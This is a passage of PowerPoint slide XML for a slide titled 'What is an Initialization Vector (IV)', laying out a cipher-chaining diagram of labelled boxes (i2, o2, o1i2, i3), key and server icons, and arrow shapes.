      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1022" grpId="3"/>
    </p:bldLst>
  </p:timing>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6" name="What is an Initialization Vector (IV)"/>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What is an Initialization Vector (IV)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1039" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6576906" y="2002648"/>
            <a:ext cx="652499" cy="643468"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="652497" cy="643466"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1037" name="Square"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2257" y="0"/>
              <a:ext cx="643468" cy="643467"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1038" name="i2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="126308"/>
              <a:ext cx="652498" cy="386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defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr i="1"/>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr baseline="-20250" i="1"/>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1042" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6380170" y="3921759"/>
            <a:ext cx="1045661" cy="855668"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1045660" cy="855666"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1040" name="Key_Public01" descr="Key_Public01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="18743434">
              <a:off x="210282" y="103857"/>
              <a:ext cx="372534" cy="733779"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1041" name="ServerProcess01" descr="ServerProcess01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="284789" y="0"/>
              <a:ext cx="760872" cy="584765"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1043" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6798168" y="2772551"/>
            <a:ext cx="234810" cy="952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69" y="14588"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18381" y="14460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="14357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15992" y="17991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12046" y="20474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9865" y="21267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8619" y="20448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5192" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6023" y="14613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15369" y="14588"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="1044" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6775591" y="4800035"/>
            <a:ext cx="234809" cy="952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69" y="14588"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18381" y="14460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="14357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15992" y="17991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12046" y="20474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9865" y="21267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8619" y="20448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5192" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6023" y="14613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15369" y="14588"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1047" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6570133" y="5867964"/>
            <a:ext cx="652498" cy="643467"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="652497" cy="643466"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1045" name="Square"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2257" y="0"/>
              <a:ext cx="643468" cy="643467"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1046" name="o2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="126308"/>
              <a:ext cx="652498" cy="386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defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr i="1"/>
                <a:t>o</a:t>
              </a:r>
              <a:r>
                <a:rPr baseline="-20250" i="1"/>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18038002">
            <a:off x="4604737" y="4620542"/>
            <a:ext cx="1840090" cy="686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07" y="13442"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20448" y="12698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20355" y="12343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20276" y="11988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20077" y="11314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19865" y="10605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19640" y="10002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19415" y="9328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19137" y="8690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18872" y="8087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18581" y="7484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18302" y="6916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17640" y="5781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17322" y="5249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16952" y="4753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16594" y="4292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16223" y="3831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15826" y="3405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15415" y="3015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15018" y="2589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14594" y="2234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14170" y="1915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13733" y="1561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13270" y="1312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12806" y="1029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12343" y="780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11866" y="638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11389" y="426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10913" y="284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10158" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9390" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8886" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8237" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7906" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7588" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6953" y="284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6344" y="426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6026" y="567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5721" y="674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5125" y="958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4556" y="1241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3973" y="1596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3417" y="2022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2887" y="2483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2344" y="3015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1841" y="3511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351" y="4079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="887" y="4646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="424" y="5320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411" y="5462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="834" y="5001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1258" y="4575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1695" y="4185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2159" y="3760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2384" y="3618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2609" y="3405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3072" y="3086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3576" y="2837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4052" y="2518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4569" y="2341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5072" y="2128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5589" y="1986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6132" y="1880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6661" y="1773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7204" y="1702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7734" y="1667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8264" y="1702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8754" y="1773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9257" y="1809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9734" y="1915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10237" y="2057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10701" y="2234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11177" y="2447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11641" y="2625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12542" y="3192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12979" y="3511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13402" y="3831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13826" y="4185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14223" y="4540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14634" y="4966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15018" y="5427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15376" y="5817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15746" y="6278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16104" y="6810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16435" y="7306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16766" y="7838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17084" y="8406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17667" y="9541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18196" y="10747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18435" y="11421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18660" y="12059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18872" y="12698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19071" y="13442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19243" y="14116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19415" y="14826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19031" y="14967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18660" y="15145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21176" y="11988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20607" y="13442"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1057" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6389201" y="4791004"/>
            <a:ext cx="1045662" cy="3738881"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1045660" cy="3738880"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1051" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="1149208"/>
              <a:ext cx="1045662" cy="855668"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="1045660" cy="855666"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1049" name="Key_Public01" descr="Key_Public01"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3">
                <a:extLst/>
              </a:blip>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm rot="18743434">
                <a:off x="210282" y="103857"/>
                <a:ext cx="372534" cy="733779"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1050" name="ServerProcess01" descr="ServerProcess01"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4">
                <a:extLst/>
              </a:blip>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="284789" y="0"/>
                <a:ext cx="760872" cy="584765"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1052" name="Shape"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="417998" y="0"/>
              <a:ext cx="234809" cy="952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69" y="14588"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="18381" y="14460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="14357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15992" y="17991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12046" y="20474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10281" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9865" y="21267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8619" y="20448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5192" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="14332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6023" y="14613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10281" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15369" y="14588"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="74900"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="1300"/>
                </a:spcBef>
                <a:defRPr b="1" sz="2800">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1053" name="Shape"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="395420" y="2027484"/>
              <a:ext cx="234810" cy="952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69" y="14588"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="18381" y="14460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="14357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15992" y="17991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12046" y="20474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10281" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9865" y="21267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8619" y="20448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5192" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="14332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6023" y="14613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10281" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15369" y="14588"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="74900"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="1300"/>
                </a:spcBef>
                <a:defRPr b="1" sz="2800">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1056" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="189962" y="3095413"/>
              <a:ext cx="652499" cy="643468"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="652497" cy="643466"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1054" name="Square"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2257" y="0"/>
                <a:ext cx="643468" cy="643467"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="25400" cap="flat">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
              </a:ln>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sp>
            <p:nvSpPr>
              <p:cNvPr id="1055" name="o2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="126308"/>
                <a:ext cx="652498" cy="386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defTabSz="1300480">
                  <a:defRPr sz="2400">
                    <a:latin typeface="Arial Narrow"/>
                    <a:ea typeface="Arial Narrow"/>
                    <a:cs typeface="Arial Narrow"/>
                    <a:sym typeface="Arial Narrow"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr i="1"/>
                  <a:t>o</a:t>
                </a:r>
                <a:r>
                  <a:rPr baseline="-20250" i="1"/>
                  <a:t>2</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1060" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6572391" y="3973688"/>
            <a:ext cx="652498" cy="643468"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="652497" cy="643466"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1058" name="Square"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2257" y="0"/>
              <a:ext cx="643468" cy="643467"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1059" name="o1i2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="126308"/>
              <a:ext cx="652498" cy="386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defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr i="1"/>
                <a:t>o</a:t>
              </a:r>
              <a:r>
                <a:rPr baseline="-20250" i="1"/>
                <a:t>1</a:t>
              </a:r>
              <a:r>
                <a:rPr i="1"/>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr baseline="-20250" i="1"/>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1063" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8870808" y="2016195"/>
            <a:ext cx="652499" cy="643468"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="652497" cy="643466"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1061" name="Square"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2257" y="0"/>
              <a:ext cx="643468" cy="643467"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1062" name="i3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="126308"/>
              <a:ext cx="652498" cy="386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defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr i="1"/>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr baseline="-20250" i="1"/>
                <a:t>3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1066" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8674072" y="3935306"/>
            <a:ext cx="1045662" cy="855668"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1045660" cy="855666"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
